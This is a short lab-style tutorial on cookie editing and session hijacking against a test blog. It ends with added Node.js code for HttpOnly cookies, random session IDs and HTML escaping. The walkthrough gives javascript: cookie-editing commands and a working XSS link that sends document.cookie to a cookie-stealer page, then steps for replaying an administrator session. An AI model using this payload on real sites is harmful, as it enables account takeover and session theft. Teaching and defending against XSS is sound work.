
Cookies, Code Injection and Session Hijacking

Code Injection:
There are many ways to inject code. Let's begin this section with cookie viewing and editing. Erase everything in your address bar and type in: javascript:alert(document.cookie);
Carefully examine the data.
Now erase everything again and type: javascript: void(document.cookie='user:=guest');
Run the original script again to view the cookie. As you can see, you have changed the cookie data. This is how cookie editing can be used to possibly access a site through cookies. There are many tools that can help automate this process, such as Paros Proxy, Burp Suite, and WebScarab, to name a few.
There are better ways to achieve this in a more targeted manner. Let's move on.

Session Hijacking:
Let's revisit the blog and see what we can do.
1) Open a different web browser and point it to the main page.
2) Log in to the anonymous account with the attack browser and create a post in the blog with a hyperlink that points to the cookie-stealing code that I have created. The file is named cookieMonster.php. The XSS link should look like this: <a onclick="javascript:document.location='/ghost/cookieMonster.php?monster='+document.cookie;">Pics</a>
3) Log in as the administrator with the victim browser, view the post and click on the hyperlink.
4) Go back to the attacker's browser and go to mycookies.html.
As you can see, a new session has been logged. Take the JavaScript from the page and insert it into the address bar. Go back to the blog and post a new message. As you can see, you are now the administrator. This example is a little different from real-world examples in that, a lot of the time, the session and cookie values used for user authentication are either randomly generated or based on a mathematical algorithm. There are programs out there that can help try to predict the user's next session ID.
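
The walkthrough above works only because the session cookie is readable through document.cookie and the posted link is rendered as live markup. The following Node.js code is an added example, not part of the original tutorial or its lab code, showing the server-side controls that close both gaps, plus an unpredictable session ID. The function names and the cookie names "sid" and "theme" are assumptions made for illustration.

```javascript
// Added example: defensive counterpart to the cookie-theft walkthrough.
// All function names and the cookie names "sid"/"theme" are assumptions.
const nodeCrypto = require('crypto');

// Session IDs come from a CSPRNG (256 bits), so the next ID cannot be
// predicted from earlier ones.
function newSessionId() {
  return nodeCrypto.randomBytes(32).toString('hex');
}

// Set-Cookie value for the session: HttpOnly hides it from document.cookie,
// Secure keeps it off plain HTTP, SameSite limits cross-site sends.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of what page script reads from document.cookie: browsers leave out
// every cookie that was set with the HttpOnly attribute.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.split(';').map((part) => part.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Encode user-supplied post text before it is written into the blog page,
// so a posted <a onclick=...> is displayed as text instead of parsed as markup.
function escapeHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// The link from step 2 of the walkthrough, used as sample input.
const postedLink = `<a onclick="javascript:document.location='/ghost/cookieMonster.php?monster='+document.cookie;">Pics</a>`;

const headers = [
  sessionCookieHeader('sid', newSessionId()), // constructed session cookie
  'theme=dark; Path=/',                       // constructed non-sensitive cookie
];
console.log('script can read :', scriptVisibleCookies(headers));
console.log('rendered post   :', escapeHtml(postedLink));
```

With these controls in place, the script-visible cookie string no longer contains the session value, and the post is shown as literal text, so there is no clickable handler to run.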

Developed By: Gh0$7